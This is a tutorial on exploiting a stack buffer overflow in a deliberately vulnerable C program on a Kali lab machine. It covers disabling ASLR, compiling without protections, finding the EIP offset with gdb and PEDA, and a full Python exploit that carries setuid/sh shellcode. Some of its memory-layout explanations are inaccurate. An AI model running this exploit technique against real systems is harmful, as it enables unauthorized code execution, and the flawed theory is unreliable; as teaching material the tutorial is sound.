An Introduction into Linux Buffer Overflows

Today we are going to learn more about how to exploit a Buffer Overflow vulnerability in Linux. We aren’t going to get into fancy stuff like ASLR bypass or Return Oriented Programming; Instead we are going to stick to the basics here. Everyone needs to start somewhere, Right? Consider this post as our baby steps towards the world of binary exploitation.

We are just going to exploit the hell out of a poor ELF binary using gdb. If you don’t know, GDB is the GNU Debugger; which is a command line debugging utility that allows us to dynamically debug a program. GDB allows us to perform cool stuff like viewing the values in stack and registers during the execution of a program and controlling the execution flow of a program.

Before we begin, I would like to express my immense gratitude towards Sam Bowne, for creating such a comprehensive and in-depth guide on linux buffer overflows.

Note: This tutorial uses Python 2.7 for simplicity purposes.

If you want to know how to develop exploits using Python 3, see my writeup for IMF, which deals with raw bytes in Python 3 and solves the “0x90c290c2” problem.

Let’s get started.

Theory

Buffer Overflows 

Buffer overflow is probably the best-known form of software security vulnerability. Most software developers know what a buffer overflow vulnerability is, but buffer overflow attacks against both legacy and newly-developed applications are still quite common.  

Buffers are a region in the physical memory storage used to temporarily store data while it is being moved from one place to another. For example, consider the case of streaming a video from YouTube. If the computer has no buffer memory, then the playback solely depends on the efficiency of the data transfer. But the problem is that data transfer is prone to errors and sometimes there needs a retransmission of data resulting in some delay on receiving the data. So, video streaming without buffer will suffer from jerky playback. But, with buffer memory to save the incoming data, we have to wait only a brief moment for the buffer memory to fill and after that, the video playback will be smooth; without any frozen frames or jerky playback.  

Buffers have a fixed length and programs usually expect the input within the buffer size. But, if the software developer didn’t implement proper validation of the input, then that large input will be copied to the undersized bufferwhich will lead to a condition called as Buffer Overflow.  

There are two types of buffer overflows. Stack-based buffer overflows and Heap-based buffer overflows. For simplicity reasons, we will be discussing about x86 stack-based buffer overflows.  In a classic stack-based buffer overflow exploit, the attacker sends specially crafted shellcode to a program, which it stores in an undersized stack buffer. The stack buffer cannot hold the excess incoming data and they are overwritten to the adjacent memory locations; that is on top of various critical application memory pointers, thereby leading to Code Execution. 

Let’s briefly explain how storage and retrieval of data in memory works, what registers are and how an application uses stack and heap to store and retrieve data from memory for understanding Buffer Overflows better. 

Registers 

A Register is a small memory space within the CPU, which is intended to hold small amounts of data temporarily. The size of a Register is very tiny and can range from 8 bits, 64 bits or even more. The registers will store data including memory addresses, instructions or just plain data. Consider registers as caches, but smaller and faster than a cache. 

 

Memory Hierarchy demonstrated 

There are different types of registers namely General registers, Control registers, Segment registers, Data registers, Pointer registers and Index registers. But we won’t be talking about all types of registers mentioned. We will only be talking about some registers related to stack operations like ESPEBP and EIP. Let’s briefly explain what some registers are and their functions. 

ESPExtended Stack Pointer- Stores memory address of the current top boundary (top most element) of the stack 

EBPExtended Base Pointer- Stores memory address of the base (start) of the current stack frame 

EIPExtended Instruction Pointer- Stores memory address of the next instruction to be executed 

We will explain their functions in the stack section. 

Memory Layout 

Memory layout demonstrated 

The primary memory (RAM) is arranged as a matrix, in which data can be stored temporarily. But it is difficult and complex to use this matrix as is. So, data in RAM is laid out by the operating system in a logically understandable structure as demonstrated in the above image known as the Memory layout. The memory layout has different segments. They are: 

  • Kernel Space – Contains command line arguments and environment variables. 
  • Stack– Data structure to store statically allocated data. 
  • Heap – Data structure to store dynamically allocated data. 
  • Uninitialized Data/BSS (Block Started by Symbol) – Data in this segment is initialized by the kernel. 
  • Initialized Data Contains initialized global and static variables which have a pre-defined value and can be modified. 
  • Text– Read only space where machine language instruction is stored. 

We will be getting off the subject if we are going to discuss about all the components listed above. Since, our topic is stack based buffer overflow, we will be only elaborate the operations of stack. 

Stack 

A stack is a data structure which stores temporary variables created by an application in the computer’s memory. The stack is basically a LIFO (Last In First Out) data structure, where only the recently stored data can be accessed first. In stack, variables are declared, stored and initialized during runtime. When the execution is complete, the memory of the variable will be automatically erased by the compiler. A new data can only be added on top of previously entered data and a data can only be removed from the top most part of stack. Adding a new data to stack is called a push operation and removing a data is called as a pop operation. 

Push and Pop Operations of a Stack 

Normally a stack grows upwards when new data is added. But in the case of memory layout, we have an inverted stack located just under the kernel space and it’s growth is downwards; that is, from higher memory space to lower memory space.  

The stack is also called as the Call Stack, since stacks are mainly used for returning the execution control from subroutines (functions) after their execution is completed.   

A stack can contain one or more Stack Frames. Stack frames will be discussed below. 

Stack vs Heap 

The Stack section mostly contains functions, local variable, and reference variables. Stack memory supports only Static memory allocation. That is memory allocation before execution of the application. Dynamic memory allocation is not supported by Stack. Because of this property, stacks have limited memory space available. When compared to heap, data access on stack is faster, since data is stored consecutively.  

Heap is also a temporary memory space, in which programming languages store global variables. By default, all global variables are stored in heap memory space. It supports Dynamic memory allocation. Because of this property, heap have no restriction in allocating memory. Data access speed on heap is relatively slower than stack, since data is not stored consecutively in heap. 

Stack Frames 

Stack Frames or activation records or activation frames can be considered as a mini stack with in the original stack, that contains all the variables and information required by a function in an application. When a function call occurs, a new stack frame with local variables, parameters of that function, the return address and current register values are created within the stack memory. For each function call, a new stack frame gets created in the stack. As we said earlier, a stack consists of several stack frames. Let’s take a look at the structure of the Stack frame. 

A diagram explaining the layout of Stack frames

 

There are two main pointers in a Stack frame. They are Stack Pointer (ESP) and Base Pointer (EBP) / Frame Pointer. Stack pointer points to the top of the stack and Base pointer acts as the base of the currently active stack frame. Although base pointer acts as a base of stack frame, the contents of EBP will be the memory address of base pointer of previous function.  

Whenever a new element gets added in stack, the ESP increments, thereby always pointing to the top of the frame. Once the execution of a function is over, the stack frame is destroyed and the execution flow is returned to the previous function. Destroying a stack frame is done by setting ESP (top of the stack) to EBP (base of the stack). The execution flow is returned by pointing EIP to the return address

bool checkPositive(int a, int b) // function to check two numbers are positive 

{ 

return(a>=0 && b>=0); //if they are >0, return positive; else false 

} 

 

int add(int x, int y) 

{ 

bool check=checkPositive(x,y);  

int sum=0; 

 

if(check)  

{ 

  	sum=x+y; 

return sum; //if check variable is positive, return sum of x and y 

} 

return -1; //if check variable is negative, return exit code -1 

} 

 

 

int main()  

{ 

int a=5, b=10; 

int c= add(a,b); 

printf("Sum is : %d", c); 

return 0; 

} 

C program to demonstrate function of Call Stack 

For example. Consider the above C program to add two positive numbers a=5 and b=10. The program starts with the main function; which is called by the Cruntime. Here, the main function has two initialized variables a and b.  So, a Stack Frame for main function gets created in the stack memory with initialized variables and the return address of C-runtime (Because the main function was called by the C-runtime)The variable c is defined by the output of the add( function. 

So, we’ve called the add(a,b) function from main function, to add the two numbers and passed the variables to add function as argument. Now, this is a sub-routine call from the main function. So, the execution control needs to be transferred from the main function to the add function. Thus, the execution of main function gets halted temporarily and the execution control gets transferred to the add function. Now, a new stack frame for add function gets created with the passed arguments and the return address of the main function (Because the add function was called by the main function).  

Diagram demonstrating the execution control flow between Stack Frames

 

Inside the add function, there is a boolean variable check, whose value is determined by another function called as checkPositive(). So, the checkPositive(a,b) gets called from the add function, to check the two numbers are positive or not. This is another sub-routine call, but this time from the add function. So, the execution control needs to be transferred from the add function to the checkPositive function. Thus, the execution of add function gets halted temporarily and the execution control gets transferred to the checkPositive function. Now, a new stack frame for checkPositive function gets created with the passed arguments and the return address of the add function (Because the checkPositive function was called by the add function).  

Inside the checkPositive function, there is a simple condition to check if both passed arguments are positive or not. If both arguments are positive integers, return true; else, return false. Since, a=5 and b=10,  the checkPositive function will return true. The checkPositive function will return the result and the execution control to the add function using the stack frame’s return address and the stack frame of checkPositive gets destroyed. 

Now, the value of check variable gets assigned as true, since checkPositive function returned the result. Now, the execution control is handed over to the add function, and the halted execution will be resumed.  

The add function now has a simple condition, where if check variable is true, return the sum of a and b; else, return -1. Since, check is true, the sum of a and b (15) and the execution control gets returned to the main function and the stack frame of add gets destroyed. 

Now, the value of variable gets assigned as 15, since add function returned the result. Now, the execution control is handed over to the main function, and the halted execution will be resumed.  

The main function will print Sum is : 15 and returns 0 and execution control to the C-runtime and the stack frame of main gets destroyed and the execution of the c program is completed.  

A word on EIP 

We have discussed that we use return address of a stack frame to return to the previous function, once the current function’s execution is finished. To understand that, we have to know about a register called EIP (Extended Instruction Pointer). EIP is also called as a program counteras it stores the memory address of the next instruction to be executed, once the execution of current instruction is over. So, once the execution of the current function is finished, the EIP will be pointed to the return address of the previous stack frame. Thus, the CPU will redirect the execution flow to the previous function. 

Now that we have discussed the operations of stack and the related terminologies, let’s jump into the exciting part. The actual Buffer Overflow exploitation. 

Before going on with Buffer Overflow exploitation in Linux, we have some prerequisites to take care of. Setup your lab with the following software and configurations as listed below, before proceeding further. 

Prerequisites 

  • An x86 Kali Linux machine with ASLR disabled (Virtual Machines is preferred) 
  • Vulnerable C program from here
  • Python 2.7 (Included in Kali) 
  • GNU project Debugger (GDB) for debugging (Included in Kali) 
  • GNU Compiler Collection (GCC) for compiling C files (Included in Kali) 
  • Python Exploit Development Assistance (peda) for GDB from here

Configuration 

  • Disabling ASLR on  Kali Linux  

On terminal enter the following command to check if ASLR status. 

cat /proc/sys/kernel/randomize_va_space 

There are three numbers representing ASLR states. 

0 = Disabled 

1 = Conservative Randomization 

2 = Full Randomization 

By default, ASLR will be set to Full RandomizationIf this is the case, then the output of the above command will be 2. 

Use the following command to disable ASLR, and verify the change by once again using the above command. 

echo 0 > /proc/sys/kernel/randomize_va_space

 

  • Python Exploit Development Assistance (peda) for GDB  

GDB is a free and open source command line debugger for reverse engineering executables. GDB is an extremely powerful and flexible tool for reverse engineering enthusiasts all around the world and it supports several programming languages.  

PEDA is an extension to the normal GDB. PEDA adds a ton of useful features to GDB, making the debugging easier. Some features of PEDA are listed below: 

  • Colorise gdb terminal – Easier reading 
  • aslr – Show/set ASLR setting of GDB 
  • checksec – Check for various security options of binary 
  • dumpargs – Display arguments passed to a function when stopped at a call instruction 
  • dumprop – Dump all ROP gadgets in specific memory range 
  • elfheader – Get headers information from debugged ELF file 
  • elfsymbol – Get non-debugging symbol information from an ELF file 
  • lookup – Search for all addresses/references to addresses which belong to a memory range 
  • patch – Patch memory start at an address with string/hexstring/int 
  • pattern – Generate, search, or write a cyclic pattern to memory 
  • procinfo – Display various info from /proc/pid/ 
  • pshow – Show various PEDA options and other settings 
  • pset – Set various PEDA options and other settings 
  • readelf – Get headers information from an ELF file 
  • ropgadget – Get common ROP gadgets of binary or library 
  • ropsearch – Search for ROP gadgets in memory 
  • searchmem|find – Search for a pattern in memory; support regex search 
  • shellcode – Generate or download common shellcodes. 
  • skeleton – Generate python exploit code template 
  • vmmap – Get virtual mapping address ranges of section(s) in debugged process 
  • xormem – XOR a memory region with a key 
Colourized GDB Terminal with PEDA 

Using a CLI debugger rather than a GUI debugger can feel counter intuitive and overwhelming to a beginner, but don’t worry too much. GDB is very intuitive, free and open source, have simple commands and is extremely powerful than most of its GUI counterparts. 

GDB will be already installed with Kali linux, so we don’t need any configuration to do for GDB. But, we do have to install and configure PEDA to work with GDB. 

To do that, first clone PEDA by using the following commands. 

git clone https://github.com/longld/peda.git ~/peda 
echo "source ~/peda/peda.py" >> ~/.gdbinit 

That’s it! We have done installation and PEDA is integrated with GDB. 

The exploitation phases are exactly the same as we discussed with the Windows buffer overflow exploitation.  

  • Compiling Vulnerable C script with -NO-PIE and EXECSTACK Flags 

Position-independent Executable or PIE can be executed at any memory address without modification; Unlike absolute code/executable, which must be loaded at a specific memory location to execute. 

PIE ensures the correct Application of ASLR protection. If PIE is not setup during compilation of an application, then full ASLR cannot be achieved and can lead to security issues.  

For this exercise, we have disabled ASLR and we are going to make an executable with no pie functionality. We can disable PIE by using the -no-pie flag while compiling. 

Also, executing shellcode from stack memory is disabled by default as a data execution protection mechanism. We can bypass this by using the -z execstack flag while compiling. 

Below is the vulnerable code for the buffer overflow experiment, obtained from  Samclass tutorial

#include <string.h> 
#include <stdio.h> 

int copier(char *str){ 
char buffer[100]; 
strcpy(buffer, str); 
}

void main(int argc, char *argv[]) { 
copier(argv[1]); 
printf("Done!\n"); 
} 

Save this code as bof.c in our Kali machine, and enter the following command to compile this code into an ELF(Executable and Linkable Format) file with no PIE and enabling execstack flag. 

gcc -g -z execstack -no-pie -o bof bof.c 

If compilation was successful without any errors, then there will be an elf file named bof in the current directory. 

We can execute this program by using ./bof. 

Exploitation Begins

  1. Fuzzing 

Now that we got the executable to test the Buffer Overflow, the next step is to fuzz the executable to find the buffer length. But since we have the source code to the executable, we know that the buffer length is 100 characters long.  

Our vulnerable program will accept a string as argument, use strcpy function to copy the argument to buffer memory and then prints Done. 

So, let’s use more than hundred characters. Say 120 characters to see if we can overflow the buffer. 

Create a string with 120 characters in length using python one liner like below. Enter the command in terminal. 

python -c 'print "A"*120' 

Now, copy the 120 A’s and pass it as an argument to our bof executable. 

./bof AAAAAAA… 

Great! We’ve successfully filled the Buffer of bof. 

  1. Locating EIP offset 

We have to create a simple python script before we get into gdb, so that it’s easier to modify the arguments. Save the below line as arg.py. 

print 'A' * 120 

Now we can get into gdb to find the exact offset of the EIP. Enter the following command to start gdb. 

gdb -q ./bof 

With that above command, you should see an output like below. 

Gdb is now up and running. Gdb has a nifty feature, to read source code from a binary if that binary contains debug information. 

We can check a binary is stripped or non-stripped by using the file command in the terminal. 

file bof

Now since out binary is not-stripped of debug information, we can use the list command to list the lines of the source code from the binary. 

Enter the list command inside gdb to list the source code of the file. 

This is pretty great to setup breakpoints at a certain line, before the execution starts. 

Let’s go ahead and set up a breakpoint after the strcpy function, since that’s where the buffer overflow happens. We can see that, strcpy is at line number 9, so let’s setup a breakpoint at line 10, so that we can observe the register contents when the crash happens. 

break 10 

Now, we can run the bof binary inside the gdb and see what happens to the registers when the crash occurs. 

To run the binary, type run and pass arguments to the binary, after run. For example, to send 120 A’s as argument to the bof binary, we can use the following command inside gdb

run $(python arg.py) 

After this comment, gdb is going to halt the program at the breakpoint we set and display the state of registers. It’s a full page input but since we’ve installed PEDA, the input is less threatening and easy to read. We are looking for the series of A characters we passed as argument.  

The output of the above command is given below. 

GDB output after crash

We can see from the output that ESP (at the top) and Stack (at the bottom) are filled with our A’s, but not EIP. This is because the program is halted at the breakpoint. 

If you look at the bottom of the output, we can see that gdb is telling us Breakpoint one has been reached and the program is paused at the breakpoint.  

Enter c to continue the execution and observe the output now. The output after the crash is given below. 

Look at the bottom of gdb. It is displaying the stopped reason as SIGSEGV. It is means a Segmentation Violation signal has occurred and the program has stopped. SIGSEGV is commonly known as a Segmentation Fault. 

Now, check the registers. We can use the  info registers command to focus just on the registers. 

Observe the memory address of EIP. It is 0x41414141; which is as we learned before, the hexadecimal value for A. That means we have successfully managed to overwrite the EIP register. 

The next step is to locate the exact offset of the EIP, so that we can position a memory address to replace the EIP. Just like before, we need to generate a unique string and we can use the following command in gdb to achieve that. 

pattern create 120 

Here 120 means the length of the pattern. 

Copy the pattern, open arg.pyomment out the previous line and paste it into our arg.py script; so that our script looks like this below.  

Now, let’s run the bof again in gdb with the same command as before. 

Notice the contents of the EIP, which is translated into AA8A.  

Now, we can use the pattern search command inside gdb to search for the offset. 

pattern search AA8A

Gdb has found the EIP offset at 112. Great! 

  1. Controlling EIP  

Now that we know the exact offset, we can craft our python script in such a way that the EIP will be over written with four B’s. If this happens, then we have complete control over the EIP. 

But as a common practice, we will be entering a NOP Sled for ensuring smooth execution. 

Modify the arg.py script as shown below and run bof  in gdb. 

Modified arg.py script 
EIP written with four B’s 

We can see that EIP is cleanly overwritten with four B’s. Sweet! So, we have complete control over the EIP position. 

  1. Locating Space for Shellcode 

The next step is to find space to store our shellcode. For that, look at the register contents given in the output above.  

Let’s take a deeper look at contents of ESP, by using the following command. 

x/500x $esp 

Which will display 500 hexadecimal values from ESP.   

We can see several memory addresses that points to the NOP Sleds and A’s we sent. This is great.  

Since, we’ve disabled ASLR and this executable is not PIE, we can directly refer any memory address in EIP to redirect the execution flow. 

We are going to choose a memory address that points to our NOP Sled for ensuring smooth execution. We are selecting the address 0xbffff414 which points to the NOP Sled for overwriting the EIP. Now, let’s overwrite EIP and redirect EIP to ESP with the memory address 0xbffff414

Keep in mind that we have to modify the address into little endian format since Intel and AMD desktop CPUs are little endian formatted. So, 0xbffff414 becomes '\x14\xf4\xff\xbf'. 

Now, Modify arg.py as shown below. 

Now in gdb, enter break *0xbffff414  and run the program. When the breakpoint is hit, check the EIP register. 

We can see that, EIP points to 0xbffff414 memory address, which refers to the NOP sled we sent! Perfect! We’ve successfully redirected the EIP to our desired location. 

  1. Obtaining Shellcode 

After redirecting the EIP, the next step is to obtain a shellcode. 

We are going to use the shellcode obtained from the Samclass website for generating a Dash shell. 

shellcode = ( '\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2' + '\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89' + '\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80' )

The above shellcode will generate a dash shell on execution. Since, we are already working as root in Kali linux, this code doesn’t matter much; but this is POC (Proof of Concept) that our code works. 

Let’s incorporate this shellcode in our asp.py script, so that our script will look like as shown below. 

#!/usr/bin/python 

NOP = '\x90' * 50 
shellcode = ( '\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2' + '\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89' + '\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80' ) 

filler = 'A' * (112 - 50 - 32) #0xbffff414 
eip = '\x14\xf4\xff\xbf' 
print NOP + shellcode + filler + eip

Now, let’s run this in gdb. 

Notice that this time our program didn’t crash and the bof executable is now executing dash. Also, after the execution, we can see that the symbol is showing # indicating a root shell.  

  1. Improving Exploit Reliability 

Type in id and we’ll get returned the current user id and group id of the logged in user; i.e., root. 

It worked as we expected. But it is exiting after entering a single command. This can sometimes occur with exploits, so let’s run this one more time, but this time directly in the terminal. 

We can see that, the exploit that just worked on gdb; which spawned us a root shell, is now behaving badly! What could be the issue? 

Turns out, gdb environment and the actual environment the application runs differ slightly. Here, the issue was gdb will set some environment variables called LINES and COLUMNS to show the output on terminal properly. 

This is great for pretty output, but bad for exploit development where the environment is too sensitive to changes. 

We can see the variables set by gdb and by linux itselves by using the following command. 

show environment 

So, let’s unset the variables set by gdb inside gdb by using the following commands. 

unset environment LINES 
unset environment COLUMNS 

Now, we can check the variables are unset or not by using the show environment command. 

Good. Now the variables have been unset, let’s see the location of the shellcode in the stack. 

We can see that the shellcode location has changed slightly. Even though the address 0xbffff414 has the NOP Sled, the slight variation in stack will make it unusable. So, let’s select a different memory address. Let’s choose the memory address 0xbffff420 this time. 

Update the new address in script and run it in gdb first. 

Again, we got the shell, but stopped immediately after the execution of first command. Let’s check this in the terminal. 

Neat! Now we’ve got a reliable shell and we have successfully exploited the bof file. 

Keep in mind that Buffer Overflows are just a tip of the iceberg. There are advanced techniques like Heap overflows, ROP (Return Oriented Programming), Bypassing memory protection mechanisms like ASLR, NX, PIE, Canaries, DEP, FORTIFY_SOURCE etc. 

But, understanding how Buffer Overflows work and the techniques used for gaining code execution is the core concept in Binary exploitation. More detailed explanation on Buffer Overflows can be found here